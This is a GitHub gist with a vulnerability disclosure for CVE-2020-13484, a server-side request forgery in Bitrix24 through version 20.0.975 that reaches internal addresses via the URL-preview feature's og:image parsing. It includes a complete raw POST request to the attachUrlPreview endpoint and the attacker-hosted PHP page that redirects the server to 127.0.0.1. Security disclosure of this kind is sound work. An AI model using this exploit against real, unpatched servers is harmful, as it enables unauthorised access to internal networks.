Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2020-13484
https://gist.github.com/mariuszpoplawski/26e1fbde8f9a607478bee1de90daa329
------------------------------------------
Bitrix24 through 20.0.975 allows SSRF via an intranet IP address in
the services/main/ajax.php?action=attachUrlPreview url parameter, if
the destination URL hosts an HTML document
containing '<meta name="og:image" content="' followed by an intranet URL.
------------------------------------------
[Additional Information]
Vulnerability allow us to trigger server-side request forgery to remote
addresses and second vulnerability in this functionality allowed us to
bypass restrictions and generate other request that bypassed policy of
local IP block. We were able to generate requests in internal
infrastructure.
In first stage we have found SSRF that allowed us only send remote
requests. Then we manipulated the parser to parse our HTML page and
generate second request to internal bitrix core at server side. Bitrix
was prsing og:image tags, this way we could triggeer second SSRF. The
second request was not properly checked for "local" IP's.
To generate SSRF we need to trigger following request:
POST /bitrix/services/main/ajax.php?action=attachUrlPreview&show_actions=y&buildd_preview=y&die_step=3&admin_section=Y&show_cache_stat1=Y&clear_cache=Y&c=bitrix:main.urlpreview&mode=ajax&=&sessid=bd277e27ef185f42bebbb1d538e66574&signedParamsString=1.12&listSubscribeId[]=1&itemId=1&deleteSubscribe=Y&userFieldId=0&elementId=1 HTTP/1.1
Host: 192.168.1.24
Origin: http://192.168.1.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Bx-ajax: true
Accept: */*
Referer: http://192.168.1.24/stream/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: BITRIX_SM_TIME_ZONE=-120; BITRIX_SM_SALE_UID=0; BITRIX_SM_SOUND_LOGIN_PLAYED=Y; PHPSESSID=btu7cck1irm51hsgs45akh5dma; BITRIX_SM_NCC=Y; BITRIX_SM_LOGIN=admin; BITRIX_SM_LAST_SETTINGS=;show_cache_stat=Y
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
url=http://OurVPSHost/index.php?id=1
"OurVPSHost" host index.php file:
---------------------------------
<?php header('Content-Type:text/html'); ?>
<meta name="og:image" content="http://127.0.0.1/fake_img.php"/
---------------------------------
Vulnerability send second SSRF, first one do not allow send internal
request but the HTML parser parse our og:image tag and send internal
request by redirecting bitrix server to 127.0.0.1/fake_img.php. This
way we are able to bypass the restrictions of bitrix core.
------------------------------------------
[VulnerabilityType Other]
Unauthorized server side request forgery, bypass domain whitelist
------------------------------------------
[Vendor of Product]
1c-bitrix.ru, bitrix24.net
------------------------------------------
[Affected Product Code Base]
Bitrix and Bitrix Cloud instances affected - up to security update (main 20.0.975), reported and fixed in latest patch
------------------------------------------
[Affected Component]
Main core URLPreview function
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[CVE Impact Other]
Force server side request forgery
------------------------------------------
[Attack Vectors]
To exploit vulnerability attacker need access to the website, valid
unauth session and CSRF token - all can be generated w/o any
privileges, no additional requirements needed.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Mariusz Poplawski (afine.pl)
------------------------------------------
[Reference]
https://www.bitrix24.com/prices/self-hosted.php
https://www.bitrix24.com/security/
Mariusz Popłwski / AFINE.com team
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.